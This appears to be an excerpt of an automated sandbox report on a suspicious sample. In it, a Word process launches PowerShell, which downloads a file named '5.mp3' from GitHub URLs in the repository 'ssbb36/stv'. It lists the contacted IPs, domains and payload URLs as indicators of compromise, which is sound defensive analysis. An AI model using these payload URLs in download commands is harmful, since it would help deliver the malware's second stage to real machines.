behaviorgraph top1 signatures2 2 Behavior Graph ID: 515215 Sample: RfORrHIRNe Startdate: 04/11/2021 Architecture: WINDOWS Score: 88 19 Antivirus detection for dropped file 2->19 21 Antivirus / Scanner detection for submitted sample 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 6 other signatures 2->25 6 WINWORD.EXE 292 23 2->6         started        process3 file4 13 C:\Users\user\...\~DFA094A62AA4BA8959.TMP, Composite 6->13 dropped 27 Suspicious powershell command line found 6->27 10 powershell.exe 16 6 6->10         started        signatures5 process6 dnsIp7 15 github.com 140.82.121.3, 443, 49165, 49166 GITHUBUS United States 10->15 17 raw.githubusercontent.com 185.199.108.133, 443, 49167 FASTLYUS Netherlands 10->17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.199.108.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
140.82.121.3
 github.com United States
36459 GITHUBUS false

Contacted Domains

Name IP Active
github.com 140.82.121.3 true
raw.githubusercontent.com 185.199.108.133 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 false
  • Avira URL Cloud: safe
 unknown
https://github.com/ssbb36/stv/raw/main/5.mp3 false
    		high
    http://github.com/ssbb36/stv/raw/main/5.mp3 false
      		high